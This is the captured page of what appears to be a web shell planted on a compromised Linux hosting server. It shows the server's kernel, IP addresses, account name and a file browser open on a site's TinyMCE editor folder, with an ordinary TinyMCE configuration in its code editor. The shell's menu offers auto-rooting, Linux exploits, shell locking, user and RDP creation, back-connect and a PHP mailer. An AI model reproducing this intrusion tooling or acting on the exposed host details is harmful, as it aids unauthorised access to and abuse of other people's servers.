Linux server.bornosky.com 4.18.0-477.13.1.lve.el8.x86_64 #1 SMP Thu Jun 1 16:40:47 EDT 2023 x86_64
Apache
: 95.217.200.235 | : 3.144.45.236
Cant Read [ /etc/named.conf ]
7.3.33
aggscedu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
aggscedu /
public_html /
public /
Backend /
tinymce /
[ HOME SHELL ]
Name
Size
Permission
Action
langs
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
skins
[ DIR ]
drwxr-xr-x
themes
[ DIR ]
drwxr-xr-x
init-tinymce.js
2.45
KB
-rw-r--r--
jquery.tinymce.min.js
3.51
KB
-rw-r--r--
license.txt
25.81
KB
-rw-r--r--
tinymce.min.js
367.42
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : init-tinymce.js
tinymce.init({ /* replace textarea having class .tinymce with tinymce editor */ selector: "textarea.tinymce", /* theme of the editor */ theme: "modern", skin: "lightgray", /* width and height of the editor */ width: "100%", height: 100, /* display statusbar */ statubar: true, /* plugin */ plugins: [ "advlist autolink link image lists charmap print preview hr anchor pagebreak", "searchreplace wordcount visualblocks visualchars code fullscreen insertdatetime media nonbreaking", "save table contextmenu directionality emoticons template paste textcolor" ], /* toolbar */ toolbar: "insertfile undo redo | styleselect | bold italic | alignleft aligncenter alignright alignjustify | bullist numlist outdent indent | link image | print preview media fullpage | forecolor backcolor emoticons", /* style */ style_formats: [{ title: "Headers", items: [{ title: "Header 1", format: "h1" }, { title: "Header 2", format: "h2" }, { title: "Header 3", format: "h3" }, { title: "Header 4", format: "h4" }, { title: "Header 5", format: "h5" }, { title: "Header 6", format: "h6" } ] }, { title: "Inline", items: [{ title: "Bold", icon: "bold", format: "bold" }, { title: "Italic", icon: "italic", format: "italic" }, { title: "Underline", icon: "underline", format: "underline" }, { title: "Strikethrough", icon: "strikethrough", format: "strikethrough" }, { title: "Superscript", icon: "superscript", format: "superscript" }, { title: "Subscript", icon: "subscript", format: "subscript" }, { title: "Code", icon: "code", format: "code" } ] }, { title: "Blocks", items: [{ title: "Paragraph", format: "p" }, { title: "Blockquote", format: "blockquote" }, { title: "Div", format: "div" }, { title: "Pre", format: "pre" } ] }, { title: "Alignment", items: [{ title: "Left", icon: "alignleft", format: "alignleft" }, { title: "Center", icon: "aligncenter", format: "aligncenter" }, { title: "Right", icon: "alignright", format: "alignright" }, { title: "Justify", icon: "alignjustify", format: "alignjustify" } ] } ] });
Close